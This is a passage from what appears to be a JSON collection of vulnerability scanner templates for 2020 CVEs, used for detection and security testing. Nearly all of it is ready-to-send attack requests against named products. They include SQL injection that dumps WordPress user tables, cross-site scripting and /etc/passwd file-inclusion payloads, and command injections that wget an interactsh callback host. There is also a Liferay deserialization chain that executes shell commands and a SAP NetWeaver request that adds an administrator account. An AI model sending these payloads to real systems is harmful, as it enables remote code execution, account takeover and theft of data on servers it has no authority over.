application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["Gitea:"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-16139","info":{"name":"Cisco Unified IP Conference Station 7937G - Denial-of-Service","severity":"high"},"requests":[{"raw":["POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","words":["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36112","info":{"name":"CSE Bookstore 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["get book price failed! You have an error in your SQL syntax","Can't retrieve data You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2020-17463","info":{"name":"Fuel CMS 1.4.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\n\nuser_name={{username}}&password={{password}}&Login=Login&forward=\n","@timeout: 10s\nGET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_3 == 200","contains(body_1, \"FUEL CMS\")"],"condition":"and"}]}]},{"id":"CVE-2020-9344","info":{"name":"Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test","{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","jira","subversion"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15895","info":{"name":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[";alert(document.domain);","DIR-816L"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20982","info":{"name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["location.href='</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24902","info":{"name":"Quixplorer <=2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&srt=yes","My Download"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14092","info":{"name":"WordPress PayPal Pro <1.1.65 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"user_login\"","\"user_email\"","\"user_pass\"","\"user_activation_key\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-0618","info":{"name":"Microsoft SQL Server Reporting Services - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view report"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25223","info":{"name":"Sophos UTM Preauth - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /var HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.5.1.1\nContent-Type: application/json; charset=UTF-8\nOrigin: {{BaseURL}}\nConnection: close\nReferer: {{BaseURL}}\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-8191","info":{"name":"Citrix ADC/Gateway - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /menu/stapp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-NITRO-USER: xpyZxwy6\n\nsid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</title><script>alert(31337)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7961","info":{"name":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/jsonws/invoke HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\ncmd2: {{command}}\n\ncmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n"],"payloads":{"command":["systeminfo","lsb_release -a"]},"matchers-condition":"and","matchers":[{"type":"regex","regex":["OS Name:.*Microsoft Windows","Distributor ID:"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Microsoft Windows (.*)","Distributor ID: (.*)"],"part":"body"}]}]},{"id":"CVE-2020-35598","info":{"name":"Advanced Comment System 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9315","info":{"name":"Oracle iPlanet Web Server 7.0.x - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2","{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin Console"]},{"type":"word","words":["serverConfigurationsGeneral","serverCertificatesGeneral"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11547","info":{"name":"PRTG Network Monitor <20.1.57.1745 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/login.htm?type=probes","{{BaseURL}}/public/login.htm?type=requests","{{BaseURL}}/public/login.htm?type=treestat"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"]},{"type":"word","part":"body","words":["prtg_network_monitor","Probes","Groups"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10770","info":{"name":"Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-36510","info":{"name":"WordPress 15Zine <3.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35476","info":{"name":"OpenTSDB <=2.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plotted","timing","cachehit"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13820","info":{"name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus='alert(document.domain)","Extreme Management Center"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2036","info":{"name":"Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting","severity":"high"},"requests":[{"raw":["GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body_1), '<svg/onload=alert(document.domain)>')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(document.domain)>')","status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(document.domain)>')"],"condition":"or"}]}]},{"id":"CVE-2020-26073","info":{"name":"Cisco SD-WAN vManage Software - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"regex","regex":["root:.*:0:0:"],"part":"body"}]}]},{"id":"CVE-2020-11450","info":{"name":"MicroStrategy Web 10.4 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyWS/happyaxis.jsp"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Axis2 Happiness Page","Examining webapp configuration","Essential Components"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11978","info":{"name":"Apache Airflow <=1.10.10 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /api/experimental/test HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"conf\": {\"message\": \"\\\"; touch test #\"}}\n","GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, \"operator\":\"BashOperator\")","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"exec_date","group":1,"regex":["\"execution_date\":\"([0-9-A-Z:+]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-13937","info":{"name":"Apache Kylin - Exposed Configuration File","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/kylin/api/admin/config"],"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["config","kylin.metadata.url"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35774","info":{"name":"twitter-server Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9483","info":{"name":"SkyWalking SQLI","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/graphql"],"body":"{\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["UNION SELECT 1,CONCAT('~','9999999999','~')--","Exception while fetching data"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26876","info":{"name":"WordPress WP Courses Plugin Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/lesson/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["rest_post_invalid_id","\"(guid|title|content|excerpt)\":{\"rendered\":"],"condition":"or"},{"type":"status","status":[200,404],"condition":"or"}]}]},{"id":"CVE-2020-35713","info":{"name":"Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /goform/setSysAdm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/login.shtml\n\nadmuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-28351","info":{"name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13927","info":{"name":"Airflow Experimental <1.10.11 - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/latest_runs"],"matchers":[{"type":"word","part":"body","words":["\"dag_run_url\":","\"dag_id\":","\"items\":"],"condition":"and"}]}]},{"id":"CVE-2020-24949","info":{"name":"PHP-Fusion 9.03.50 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["infusion_db.php"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5192","info":{"name":"Hospital Management System 4.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hospital/hms/doctor/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}password={{password}}&submit=&submit=\n","POST /hospital/hms/doctor/search.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14882","info":{"name":"Oracle Weblogic Server - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-11529","info":{"name":"Grav <1.7  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-28976","info":{"name":"WordPress Canto 1.3.0 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["null"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29227","info":{"name":"Car Rental Management System 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=/etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19360","info":{"name":"FHEM 6.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26248","info":{"name":"PrestaShop Product Comments <4.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2020-6287","info":{"name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","severity":"critical"},"requests":[{"raw":["POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>\n  CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5U